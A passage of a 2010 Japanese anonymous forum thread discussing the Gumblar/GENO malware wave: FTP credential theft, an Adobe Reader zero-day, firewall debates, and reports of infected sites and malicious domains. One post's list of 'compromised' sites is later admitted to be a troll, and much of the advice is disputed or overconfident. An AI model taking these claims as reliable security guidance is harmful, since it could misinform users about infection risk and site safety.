180 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/02(土) 10:46:20 ]: "fff=op.split(" "fff.op.replace(" の検索結果約 14,200件

>>172
サイトのタイトル
惡意連結網址列表 (Malware Domain List) | 資安之眼
実際に表示されるサイトのURL
ttp://www.itis.tw/badlink
IPアドレス
60.248.88.10
逆引きホスト名
ns1.misway.com
181 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/02(土) 12:57:42 ]: >>176
知らねえ奴は黙ってろ
182 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/02(土) 20:59:02 ]: あーわかった
FFFTPのインポート/エクスポートってレジストリファイルを読み込み/出力してる
だからGumblarはレジストリからFTPでアクセスする（改ざんする）サイトをみてるわ

FTPソフトってどれもレジストリいじってるのか？

てっきり普通のファイルに保存してるのかと思ってたぜ
183 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/02(土) 22:07:17 ]: FFFTPはini保存もできるし、パス抜きは普通にポート見てるだけだろ。
FTPは平文で、だからSFTP使えって話になってるんだよ。
184 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/02(土) 22:24:42 ]: >>183
知らねえ奴は黙ってろ
185 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/02(土) 22:56:18 ]: >>183
>>125の状況みるとポートだけ見てるだけではないと思うが
レジストリにＦＴＰのIDとパスを書き込んでるんから
そこで見破られたんじゃないかという話
SFTP使ってもレジストリいじるソフトなら意味んじゃないか

まあ感染してない奴が憶測で言ってもしょうがない
186 名前：名無しさん＠お腹いっぱい。 [2010/01/02(土) 23:35:36 ]: Unmask Parasites. Blog.がものすごく詳しいな。
187 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 00:33:44 ]: うわまたきてるｗｗ
放置してたんでパス変えるの忘れてたサイトみたらやらてたｗ
時間は2010/01/02 23:27

やっぱ感染するとFTPのIDとパス盗まれてるわ
FTP接続しなくても改ざんされてるｗｗ
188 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 00:52:23 ]: 「F-Secure Exploit Shield 0.70 build 19」
ttp://www.f-secure.com/en_EMEA/downloads/beta-programs/home-office/exploit-shield/index.html
解説サイト→ttp://all-freesoft.net/soft/vulnerability/f-secureexploitshield/f-secureexploitshield.html

XP SP3でavast!と共存させて人柱してるが、問題無く稼動中。
189 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 01:04:44 ]: F-Secureはこれ検出すんの？
190 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 01:11:48 ]: じゃあ、ウィルスサイト踏んでも、FTPインスコ済みID記憶済み、FTP未接続で
サイト感染が無ければ白ってことか？
191 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 01:21:48 ]: >>189
試したところ駄目っぽい感じ
192 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 01:28:54 ]: >>186のブログの翻訳を読んでみたが
今発病してるサイトの運営者はだいぶ前から感染していて
すでにFTPのIDとパスは盗まれてるようだ
だからウィルスまいた奴の好きな時間にサイトを改ざんできる
防ぐにはFTPのパスを変えるしかなさそうだ

だいたいこんなかんじじゃね
GNU GPL踏むとFTPのIDとパスがあれば盗まれる
サイト運営してない人はたぶん無害かも

改ざんの告知にウィルススキャンだけでなく
サイト運営者はFTPパスの変更も加えたほうがいいかもな

JRの時は2週間ぐらい放置してたんだろ
FTPパス盗まれた運営者まだたくさんいると思うぜ
193 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 01:30:31 ]: 何を今更
194 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 01:33:31 ]: >>186でもの凄く詳しいな、って書いてるけど内容はその程度なのか
195 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 01:39:35 ]: トークン認証でよくね？
196 名前：188 mailto:sage [2010/01/03(日) 01:42:57 ]: よ～く見たら、ですね･･･
防いでくれてるのは
CVE-2006-3730
CVE-2007-0038
CVE-2006-4868
CVE-2006-4301
CVE-2008-3008
CVE-2006-0005
CVE-2008-4844
CVE-2009-0901
CVE-2009-0927

「CVE-2009-4324」入って無いじゃん･･･ (´･ω･｀)

gred AVアクセラレータの方が良いかもしれん
197 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 01:46:57 ]: gredなんか論外だが
aviraやavastやらでも対応は出来る
ファイアウォール程度入れとけ
198 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 01:56:00 ]: FWで防げるのに広まってるの？
199 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 02:01:58 ]: ファイアウォール入れとけばおかしな通信があるからすぐ分かるね
実際にこの通信がパスワードを流してるかどうかは不明だけど
間違いなくおかしいと気づく
200 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 02:11:10 ]: 多くの人が無防備ってことだろうな
MSEなんか使ってファイアウォールはWin標準なんて人も多かったんじゃないのかな
201 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 02:26:14 ]: 実際のところサイト運営者以外無害なのか

おまえらサイト運営してるの？

>>187以外にいる？
202 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 02:34:14 ]: 報告にもあるとおり
Windows起動時のスタートアップに実行ファイルを登録する
その実行ファイルが通信する
その他システムの改変は今のところ俺は確認してない
しかしどんな攻撃でも可能だから注意は必要
203 名前：188/196 mailto:sage [2010/01/03(日) 03:02:59 ]: >>197
PC Tools（笑）を入れてるよ
v6.0.0.86
204 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 04:34:02 ]: Firewallのログを見ておかしな通信を見つけたところでもう遅い
その通信を止めてくれてこそ役立ったってことでしょ
だいたい警告もないのにFWのログなんて見ます？
実際には大手のサイトのWEB制作会社がFWも入れてないとは
考えられないので、FWは突破されてしまっているんでしょうね
205 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 04:36:13 ]: 最初の通信で問い合わせがあるだろ
まあ使ってるソフトにもよるがそう言うソフトを使えってこと
206 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 04:39:40 ]: >>204
知らねえ奴は黙ってろ
君にはこれが適切
207 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 04:40:09 ]: >>205
そういうのをセキュリティソフトに対する過信って言うんだよｗｗｗ
208 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 04:41:26 ]: 試せば分かること
知らねえ奴は黙ってろ
209 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 04:43:19 ]: >>207
書き込み内容からして無知なのは明らかだが
なんでそんな自信ありそうな語り口なんだ
210 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 04:45:16 ]: >>208
じゃあ、何を試してどういう結果になったか全部書き出せよ
FWを入れていれば大丈夫みたいないい加減なこと書き込まないでさぁあ
211 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 04:47:40 ]: >>210
このスレに全部書いてあるんじゃないか
このスレは色んな人がいるから仕方ないが
まともなこと言っても無知なやつが偉そうな口調で否定するからこまる
212 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 04:51:38 ]: >>211
だから、具体的にどこのFWなら、ちゃんと警告を出して
どこのものなら、簡単に突破しているって出してみろよ
213 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 04:55:18 ]: 初心者スレいけよ
214 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 05:00:05 ]: なんだここは、全くの役立たずスレだな
実際にはFWが役に立っているかどうかなんて分からないくせに
いい加減なこと書き込むんじゃね～ＹＯ・・・ボケｗ
215 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 05:06:43 ]: お前みたいなやつは何言っても駄目だろ
全部書いてあるって言ってるのに
だから自分で試せよ
216 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 05:09:10 ]: >>214
質問するならちゃんとした文章で質問してくれ
偉そうな態度で聞かれても誰も答える気は起きない
217 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 05:56:43 ]: >>204
君はサイト管理者を過信してるんだよ
サイト管理者なんていい加減なんだろうな
そうでもなければこんな
>>159
こんなに放置されないだろ
218 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 06:06:09 ]: ＞サイト管理者なんていい加減なんだろうな
だよな
はいりのとこまだ埋め込まれてるしｗ

あと削除してもちゃんと告知してるとこなんてわずかだろ
他の運営者にも広めてちゃんと対策とらせないとまだまだ続くぞこれ
219 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 06:38:40 ]: そうだな、アホなサイト管理者はたいてい

Avira AntiVir Personal＋Comodo Firewall

で完璧！
これ以上のセキュリティはありませんとか信じ込んでるからなｗｗｗ
220 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 06:49:09 ]: アホなサイト管理者を叩くのはいいが何とかしてもらわないと困るのは俺らだぜｗ
221 名前：186 [2010/01/03(日) 10:31:55 ]: 全容が全く掴めていない感じがする。
IBM Tokyo SOC Reportがツールを名指しするなど速い感じがしているけど。
222 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 16:38:26 ]: シス管ってなにもできないの？
223 名前：名無しさん＠お腹いっぱい。 [2010/01/03(日) 17:54:11 ]: それなりの規模になると会社の各PCにパーソナルファイヤウォールを入れないことが多い。
シス管のPCも例外ではない。
会社のシステムでトラブルの原因になるから。

そもそも、ファイヤーウォールが反応したときは、すでにウイルスを埋め込まれていたとき。

ところでウイルスに感染したPC自体ででウイルスがかってにサイト書き換えたりはしないのかな
224 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 18:38:48 ]: ローカルに保存されてるHTMLファイルを書き換えるってのは、よくある手法だけど
225 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 18:57:52 ]: 今回のGumblarの騒ぎをまとめると

最初の感染ルートはadobeの0-dayでこのときにFTPのIDとパスが盗まれる
このときは感染したかはわからずウィルススキャンでも検出できない

発病の第一弾がJR東日本やHONDAのときで12/20ごろ
第二段が12/25ごろ、中小サイトに感染がみられこのスレが立ったころ
第三弾が1/2 >>187

この発病というのがHPの改ざんでGNU GPLが埋め込まれるということ
すでにFTPのIDとパスが盗まれてるので運営者が接続してなくても第三者が改ざんできる

でこのGNU GPLが埋め込まれたHP見てもロシアなどの怪しいサイトに接続しようとするだけで
セキュリティソフトも反応ので実際のところ無害と思われる

こんなところだな
226 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 19:06:36 ]: 以上、古畑任三郎でした
227 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 19:40:42 ]: 要は自分が管理するFTPサーバを持たない奴は特別気にすることはないと理解していいのか？
228 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 19:53:24 ]: 今のところは
ただ言われているとおり
いつ攻撃が変わるか分からない
プログラムを実行できてしまうのでどんな攻撃も可能だから注意
229 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 21:19:51 ]: 個人用のセキュリティソフトはほとんど役に立たないで・・・ＦＡ
230 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 21:24:20 ]: そんなことはない
231 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 21:47:44 ]: んだんだ
脆弱性突かれているのを防ぎきれるもんではないわな
FWもやられてしまうと考えるのが普通
232 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 22:04:45 ]: あほ
233 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 22:06:22 ]: むしろ無知な人以外にはかなり防御しやすい攻撃
234 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 22:21:11 ]: 大騒ぎになるマルウェアって単純なやつも多いよな
P2Pで流行った情報流出みたいにファイアウォールだけで防げるのも多い
ファイルを実行しちゃう時点で駄目だけど
235 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 22:22:12 ]: FTPアカウントを攻撃者に送る通信って、何番のポートで行われる？
これが80番や443番とかじゃなければ、アウトバウンド通信の制御をしてれば
ある程度防げそう。
236 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 22:23:50 ]: だから制御なんて考えなくてもポップアップされるって
あくまでも今のところな
237 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 22:25:36 ]: 防げれない。
238 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 22:28:25 ]: >>234
単純だからアンチウイルスも検出しにくいって言うのもあるね
239 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 22:39:11 ]: 脆弱性を突かれしまったらアンチウイルスもFWも全くの無力
ここの連中どんだけ呑気なんだよｗｗｗ
240 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 22:49:15 ]: しつけえな
241 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 22:51:50 ]: 悔しいから嘘まき散らしてるんだろ
べつに争ってるわけじぇねえんだからやめろよ
242 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 22:59:31 ]: 脆弱性突かれてもFW入れていれば情報は漏れない・・・ぷぷぷ
嘘の情報流すのはよせよ
243 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 23:00:19 ]: FW云々は
事前に感染を防げるかと
感染後の被害を防げるかで
話が噛み合ってない気がする
244 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 23:08:15 ]: 要は0-dayをどうやって防ぐかってことだろ
Adobe Reader使わなきゃいいんじゃね
245 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 23:09:08 ]: >>243
話はかみ合ってないが
漏れてないと思うね
246 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 23:11:26 ]: >>244
もちろん脆弱性をふさぐのは基本だけどね

たとえ脆弱性残したままだったとしても
FWがあればこの攻撃に気づくってだけの話
247 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 23:16:01 ]: 誰もFWで感染が防げるとか言ってない
一人勘違いしてるみたいだが
同じような人がいるかも知れないから勘違いしないようにね
248 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 23:21:38 ]: 実際は性能の良いHIPSがあるFWなら防げるけどね
249 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 23:25:32 ]: >>242
こいつはなんにも分かってない
脆弱性も分かってない
250 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 23:32:21 ]: snortとかに検知ルールがりがり書けばええねん
251 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 23:34:10 ]: adobeなんで0DAY長期間放置してるんだ？
252 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 23:38:11 ]: adobeに関してははっきりと告知すべきだよな
ほとんどの人は知らないんじゃないか
253 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 23:39:39 ]: データ抜いて外部に流すタイプならいいけど
システムやファイル破壊するタイプとか出たら
FWじゃどうしようも無いからなぁ
254 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 23:39:48 ]: 少なくともカスペは駄目だった
oshiete1.goo.ne.jp/qa4982913.html
255 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 23:42:36 ]: >>252
お前だけだそんなこと思ってるやつ
自分で情強とか思ってるだろ
256 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 23:43:07 ]: >>252
FlashPlayer更新してない人も世間的に結構居るんでね？
どこそこの動画サイトで不具合出るから古いのに戻したとかも居そう
257 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 23:45:11 ]: >>256
お前だけだそんなこと思ってるやつ
自分で情強とか思ってるだろ
258 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 23:45:23 ]: >>255
そんなこと思うわけねえだろ
頭大丈夫かよ
情報が行き届いてないから感染するんだろ
馬鹿め
259 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 23:46:12 ]: >>255
おまえそんなに悔しいのかよ
260 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 23:46:40 ]: >>258
自分で情強とか思ってるだろ
261 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 23:47:34 ]: >>259
おまえそんなに悔しいのかよ
262 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 23:47:37 ]: >>260
なんだよ情強って？
日本語で書いてくれよ
263 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 23:48:24 ]: >>262
おまえそんなに悔しいのかよ
264 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 23:48:52 ]: 悔しくても荒らすなよ
だいたいなんでそんなに悔しいがるんだよ
勘違いしてるんじゃないか
265 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 23:51:57 ]: >>254
かわいそうに悔しくても荒らすなよ
だいたいなんでそんなに悔しいがるんだよｗｗｗ
266 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 23:53:15 ]: ファイアウォールやアンチウイルスの設定書き換えちゃったりは無いの？
267 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/03(日) 23:56:39 ]: >>266
今のところ無許可で書き換えはないと思う
最近のは保護機能があるのも多いしね
268 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 00:10:49 ]: oshiete1.goo.ne.jp/qa4982913.html
自分も初期のGENOウイルスでカスペルスキーで感染しました。
良くHIPSやプロアクティブの事を言われる方を見受けますが実際は
GENOウイルスには全く役に立ちませんでした、

そのGENOで４月末から５月初旬まで非常に困った経験者です。
初期のものはカスペルスキーでも反応はするのですが阻止できませんでした。
前バージョンの7.0をWin2000で使っていましたが、アドビリーダーの５と9を
両方混在させていたのが失敗でした。

IE6、ファイヤーフォックス３でのグーグルツールバーに細工をしてしまい、
何を検索しても、海外の謎の黒バックに青文字のサイトが表示されてしまいました。
次に出たバージョンでは、なにを検索しても404Not Foundと表示されて、
（404にも色々なバージョンがありました。）実は表示自体がウソで他のサイトに
さらにアクセスさせようとしていました。何かの送信が止まらない、ネットワークの
切断出来ない。IPアドレスの解放と再収得が出来ない。なんだこれは。といった
状態で、ブチ。とLANケーブルを引っこ抜きました。
269 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 00:16:51 ]: >>267
どうもです
取り敢えず安心できそう
270 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 00:25:11 ]: ていうかこれもうGENOと呼ぶには違うんじゃね
ＪＲＥって呼ぼうぜｗ
271 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 00:42:25 ]: >>243
実際>>159で試したところ
FWで最初に確認できるアクセス以前での情報流出は確認できない
あくまでもそのサイトでってことだけどね
272 名前：名無しさん＠お腹いっぱい。 [2010/01/04(月) 03:19:13 ]: imepita.jp/20100104/114370

私のPCが起動するとこんな風になるようになったんですが、
これはこのスレのウイルスに該当しているんですかね？

ちなみにOSはvistaで、
この画像の状態は起動して、
ロゴマークがでて、ユーザーログインしてからの状態です。
273 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 03:21:56 ]: 矢印のアイコン出て固まる感じ？なら、そうだよ。
274 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 03:31:31 ]: カーソルは動くんです
でも背景が真っ暗で、下のスタートのバー？所が真っ白になってます。
真っ白な所に合わせると、矢印から砂時計になります。
この画面から何も操作できないです。

どうすれば復旧できますか？
甘えかも知れませんが、教えていただけるとありがたいです。
275 名前：名無しさん＠お腹いっぱい。 [2010/01/04(月) 06:20:38 ]: >>268
＞自分も初期のGENOウイルスでカスペルスキーで感染しました。
＞良くHIPSやプロアクティブの事を言われる方を見受けますが
＞実際はGENOウイルスには全く役に立ちませんでした、

カスペルスキーの無力ぶりにワロタｗｗｗ
276 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 07:43:59 ]: たかが個人向けの有料あるいは乞食版FWのログを見て無理やり
安心しようとしているところが笑えるスレですね

回避されてるんじゃぁあって思わないのかね
でなきゃこんだけ広がるのはおかしいでしょ
277 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 08:10:45 ]: >>276
こういうスレ見てる奴はまあいいんだよ

問題なのはPCに使われてる(笑)一般人
GumblarとかGENOとか知ってる？て聞いても「なにそれ」で終わる
もちろんセキュリティソフトなんて入れてないし、入れようともしない
家電感覚でPC買ってる奴はこんなんばっかりだな
278 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 08:13:43 ]: >>276
ほんとしつこいね
その程度の人はお前だけだよ
279 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 08:27:36 ]: >>278
ほんとしつこいね
その程度の人はお前だけだよ
280 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 08:29:20 ]: たしかに>>278が一番バカっぽいｗｗｗ
281 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 08:30:29 ]: しつこい阿呆のために説明すると
脆弱性を利用してpdfupd.exeがダウンロードされ実行される
トロイ本体が解凍され実行される
ここで通信が行われるからすぐ分かるって話なんだよ
異変に気づけば何らかの対処ができるだろうってこと
282 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 08:30:43 ]: 一番バカっぽいのは>>278で決まりですね！！！
283 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 08:32:02 ]: それでも分からないなら自分で試せ
これでおしまいにしてくれよ
284 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 08:33:08 ]: よほど悔しかったみたいだなｗ
285 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 08:35:16 ]: >>281
で、どこのFWなら分かって、どこのFWなら分からないの？
286 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 08:44:35 ]: 外向きの通信が発生したとき分かるようなソフトならどれでも良いだろ
分からないFWは外向き通信を監視しないやつやそう設定してる場合

具体的にと言うなら俺はOutpostを使ってる
もちろんその他のソフトでも問題ない
287 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 08:59:26 ]: アウポなら大丈夫かもしれんけど、そんなもん普通使ってないから
288 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 11:30:31 ]: 海外からのFTP接続を拒否れば書き変えは不可能ってことでOK？
289 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 11:37:57 ]: そんな設定レン鯖で出来るんか？
290 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 12:00:36 ]: 普通のレン鯖じゃ無理だろうね
291 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 12:05:59 ]: >>274
>>4
テンプレ見てないんじゃ甘えだろ
感染前のレジストリに戻せば直るかもな
292 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 17:08:49 ]: 年末に感染サイト踏んで、今日までPCオフで様子見。ようやくFTP起動させてサイトのデータDL
数分待って自サイトソース確認するも改ざん現れず

何故生き残ったのか、自分でも分からん
XP（昨年11月以降未うｐ立て）、IE6（ジャバスクオン）
adobeリーダーのジャバスクは切ってあったが、これが命綱だったのか？
293 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 18:23:09 ]: 年末にadobeらしきアップデートが出てきてPCがクラッシュしたとか言い出したのが社内にいて
そいつに教えておいたFTPアカウント全部書きかえられてたわ
294 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 18:25:36 ]: 陥落サイトを掘ってみた。
tp://kyu-ta●sakura●ne●jp/blog/
tp://kyu-ta●sakura●ne●jp/nekkei080401●mht
tp://blog●dtpwiki●jp/dtp/
tp://pcafe●blog3●fc2●com/
tp://blog3●fc2●com/pcafe/
tp://tukimisou●s10●xrea●com/
※～～xrea.comは全滅っぽい気がする

tp//lists●sourceforge●jp/mailman/archives/slashdotjp-dev/
tp://www●aoki●ecei●tohoku●ac●jp/topic/RSNA_press_release/HealthImaging_com●mht
妙なとこだけ改竄されてるし
295 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 18:34:34 ]: gumblar．cn/が復活してるね
↓
www.google.com/safebrowsing/diagnostic?site=gumblar.cn/&hl=ja
Google が最後にこのサイトを巡回したのは2010-01-03で、
このサイトで不審なコンテンツが最後に検出されたのは2010-01-03です。
296 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 19:16:37 ]: ＞＞294
教えてやれよ
297 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 20:54:55 ]: >>296
294じゃないけど、fc2の方にメールを送ろうと思ったら
IDを持っていないとそもそも相手にしてくれないようなので
メールすら送れない・送り先が分からない。

こういうので個人あてにメールを送っても返信が来た試しがない。
298 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 20:55:09 ]: >>294
どこもやられてないじゃん。
お前さんのキャッシュに妙な物が追記されるなら、お前さんが感染してるんじゃね。
299 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 21:05:16 ]: >>298
確かに仮想機（うぃんXP2）で踏んでみても何も起こらない・・・
300 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 21:24:38 ]: >>294
新手の宣伝か？（笑）
301 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 22:11:49 ]: Trojan.Injectに感染した >>294 が居ると聞いて
302 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 22:53:39 ]: モロゾフの公式サイトでトロイ配布中
tsushima.2ch.net/test/read.cgi/news/1262611814/
303 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 23:03:25 ]: GNU GPLの8080ですな。
304 名前：名無しさん＠お腹いっぱい。 [2010/01/04(月) 23:08:20 ]: PDigiiEPG.exeだと！？
305 名前：294 mailto:sage [2010/01/04(月) 23:22:08 ]: >>298-299
釣ってすまなかったが、
感染してないという検証ありがとう。

【8080チェッカー】
ttp://www12.atpages.jp/trick1/
↑↑↑
ザル＆誤検出過多という事が証明されたよw
306 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/04(月) 23:38:33 ]: ザルは仕方ないとしても、語検出もするのかよｗ
307 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/05(火) 00:31:40 ]: >>292
数分じゃわからんよ
308 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/05(火) 00:32:45 ]: どうやらこのスレは釣り堀化してるな（笑）
309 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/05(火) 00:33:50 ]: アホが釣れた
310 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/05(火) 00:34:58 ]: >>1-999
本スレはこっちですよ。

GENOウイルススレ　★23
pc11.2ch.net/test/read.cgi/sec/1259607683/
311 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/05(火) 00:38:46 ]: >>302
に飛んだらNODが反応したんだけど大丈夫かよ
312 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/05(火) 00:39:48 ]: 反応したんだから大丈夫だろ
モロゾフで急に騒がしくなったな
313 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/05(火) 00:40:08 ]: コードそのまま貼った奴がいるからな
314 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/05(火) 00:40:09 ]: 何故毎度毎度ソースの見方も知らないくせに、あほなチェッカーを信用して
騒ぎ立てるバカが発生するのか
しかもわざわざセキュ板覗いてる程なのに
315 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/05(火) 00:42:32 ]: >>314
色んなやつがいるから仕方ない
316 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/05(火) 00:58:25 ]: モロゾフ
ttp://www.virustotal.com/analisis/94a2bd34b99ebb992e019c2b7b05e4ed6e6b9400b313b1de1cd60366e2eaa2b3-1262614148
317 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/05(火) 00:59:35 ]: 今更もう良いよ
ずっとその話してるのに
318 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/05(火) 01:17:10 ]: モロゾフ、アウト～
319 名前：名無しさん＠お腹いっぱい。 [2010/01/05(火) 01:21:44 ]: こんどはモロゾフか
いちおう、MicrosoftのSmartScreenと、ゴーグルのセーフブラウジングとやらに
モロゾフ報告したけど、いまだに変化なし
320 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/05(火) 02:29:25 ]: >>314
チェッカーの性能がわかったじゃないかw
321 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/05(火) 03:13:55 ]: 127.0.0.1にアクセスで感染確認ってできる？
322 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/05(火) 03:23:06 ]: 無理
323 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/01/05(火) 09:54:58 ]: >>307
一晩たったが大丈夫そうだ
やっぱReaderのジャバスク切ってたのが効いたらしい。今では大抵のベンダーが検出できるっぽいし、漸く一安心だ
324 名前：sage ◆sage/xLnlI [2010/01/05(火) 15:16:29 ]: >>76
踏んじゃった
